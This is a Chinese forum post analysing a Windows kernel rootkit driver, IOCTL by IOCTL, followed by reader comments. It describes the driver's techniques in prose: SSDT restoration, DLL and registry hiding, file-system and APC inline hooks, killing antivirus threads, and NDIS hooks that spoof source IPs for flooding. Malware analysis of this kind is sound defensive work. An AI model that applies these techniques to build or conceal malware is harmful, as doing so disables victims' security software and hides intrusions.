传入MmGetSystemRoutineAddress在内核空间的地址，用于获取内核导出符号（函数和变量）的地址，符号列表IoDriverObjectType，ZwCreateKey，ZwSetValueKey，ObReferenceObjectByName，PsLookupProcessByProcessId，ZwOpenKey；
传入以下函数地址并保存前0x0C个字节Opcode，这些函数会被inline hook，保存的Opcode用于恢复。函数列表MmFlushImageSection，KeInitializeApc，KeInsertQueueApc，KiInsertQueueApc，MmFlushImageSection，IoGetAttachedDevice；
传入不同操作系统版本下ThreadListHeadOffsetInEPROCESS和ThreadListEntryOffsetInETHREAD，用于枚举目标进程的线程；
传出KeServiceDescriptorTable.ServiceTableBase（KiServiceTable）和KeServiceDescriptorTable.NumberOfServices，用于定位文件ntkrnlpa.exe中KiServiceTable VA，恢复内存中的SSDT；
0x22240B：
使用传入的从内核文件读取的修正为内核地址空间的KiServiceTable恢复SSDT；
0x22240F：
隐藏DLL module,主要分三部分。
1 将模块LDR_MODULE从EPROCESS->PEB->PEB_LDR_DATA的三个ModuleList中脱链；
2 遍历EPROCESS->VadRoot树，找到模块对应的节点，置零该节点的ControlArea->FileName；
3 清零模块加载后的包括文件头在内的前0x2C0字节；
0x222413：
Hook \\FileSystem\\NTFS或\\FileSystem\\FATFS文件系统驱动。具体是通过ObReferenceObjectByName()得到FsDriverObject，Hook其IRP_MJ_CARETE和IRP_MJ_DIRECTORY_CONTROL Dispatch例程，禁止除自身线程以外的其他线程访问system32目录下的驱动；
0x222417：
返回本驱动文件名；
0x222418：
KillAntiVirus功能，杀死杀软进程内所有线程。
通过传入的杀软进程Id使用PsLookupProcessByProcessId得到EPROCESS结构，遍历ThreadListHead 链表，通过ThreadListEntryOffsetInETHREAD偏移计算ETHREAD地址；然后使用保存的Opcode比较判断PspTermanateThreadByPointer，KeInsertQueueApc，KiInsertQueueApc是否被Hook，若被inline hook，则恢复；然后调用PspTermanateThreadByPointer结束线程。
0x22241C:
设置注册表键值；
0x222420：
使用已有的Hook注册表pfGetCellRoutine方法隐藏注册表项，主要用于隐藏病毒Service DLL注册表项。
具体是调用ZwOpenKey打开注册表项hKey，使用ObReferenceObjectByHandle(hKey)得到PCM_KEY_BODY，进而从其KeyControlBlock字段中得到KeyCell和KeyHive字段，Hook KeyHive的GetCellRoutine；维护一个Service DLL注册表项列表，每次将要打开注册表项和列表中项比较，匹配则隐藏。
0x222424：
Inline hook KeInitializeApc，辅以NormalContext用于阻止TerminateThread Notify。
具体做法是应用程序调用TerminateThread时将Parameter设置为0xE1F27272标识，内核会分配KAPC，并将KAPC.NormalContext设置为0xE1F27272；执行到Hook代码时，比较进程是否是病毒自身进程和标识是否是0xE1F27272，若是则设置KAPC.Inserted为1，阻止KAPC插入APC队列，从而KernelRoutine不被回调，系统不被通知。
0x222428：
删除设备引用名，恢复系统；
0x22242C：
Inline Hook TDI tcpip.sys IRP_MJ_INTERNAL_DEVICE_CONTROL:TDI_SEND_DATAGRAM；
根据对其缓冲区的操作看，缓冲区中应该是DNS查询或应答的信息，对缓冲器中内容做运算，其值在阻止域名运算值列表中比对，用于阻止某些网站的域名查询。
但是缓冲区中DNS协议的16位标志字段是0x7080，正常DNS查询应该是0x0100，所以起不到阻止作用，好像是bug。
0x222430：
Inline hook MmFlushImageSection和IoGetAttachedDevice，保存FileSystem驱动的MajorFunction表以用于恢复。
MmFlushImageSectionHook－如果FileSystemDriver的MajorFunction被Hook过（病毒会Hook IRP_MJ_CARETE和IRP_MJ_DIRECTORY_CONTROL两个Dispatch），则首先用保存的备份恢复MajorFunction表；然后当访问线程是病毒自身且为MmFlushForDelete时，返回TRUE，强力删除文件；其余线程正常；
IoGetAttachedDeviceHook－当访问线程是病毒自身，且设备驱动是FileSystemDriver时，不返回最顶层设备，而是直接返回底层\\FileSystem\\NTFS或\\FileSystem\\FASTFAT设备；
0x222434：
Inline Hook NdisMSendHandler，主要功能是填充RawIP分组，做源IP欺骗；
NdisMSendHandlerHook的主要功能首先检测数据包是不是IP数据包（Version-Length:0x45）和Protocol字段是否为0（应用程序创建RawIP+IPROTO_IP时，Protocol为0）；
若是，则检测第一个包最后双字是不是0x01010402(TCP options)，若是，则将IP报头Protocol字段设置为TCP(0x06)；若不是0x01010402，则强制设置协议类型为UDP，并且设置source IP为包最后双字，然后重新计算IP头校验和，交原来MSendHandler发送。
流程图从略
因为0x01010402(TCP options)主要是出现在TCP建立连接的三次握手阶段，所以除TCP_SYN报文外，除非TCP发送字节等于SOURCE IPADDR才会正确表明本机，但仍然被修改为UDP数据报。可以用于TCP半连接打开端口检测。
配合应用程序使用SOCK_RAWIP+IPROTO_IP socket,一方面半连接，一方面隐藏源地址，TCP报文变UDP数据报，做IP Blood攻击。
0x2A0000：
没有相关实现。
参考书籍/文档
<PE File Format>
<TCPIP Stack>
<Windows驱动程序模型 - WDM>
<I386 Architecture>
<I386汇编语言>
<Option ROM Expansion Card BIOS Information>
<IME/PEB/APC/SSDT/NDIS/VAD/MBR/DBR>

zhaotianrun

我去，那里复制的？看的头疼。。。

hu007

谢谢分享 了

ww1113330

。。。。。建议把版排好

chx3824

一个曾经的汽车行业从业者表示：什么？巴伐利亚机械制造厂股份公司出病毒了？

linuxprobe

现在木马的名字千奇百怪，很多人都被上当受骗。

13GA

谢谢大佬的分析

Joe.Du

我去，那里复制的？看的头疼。。。

慵懒丶L先森

额，文字排版看得有点累啊

呱呱生

表示完全看不懂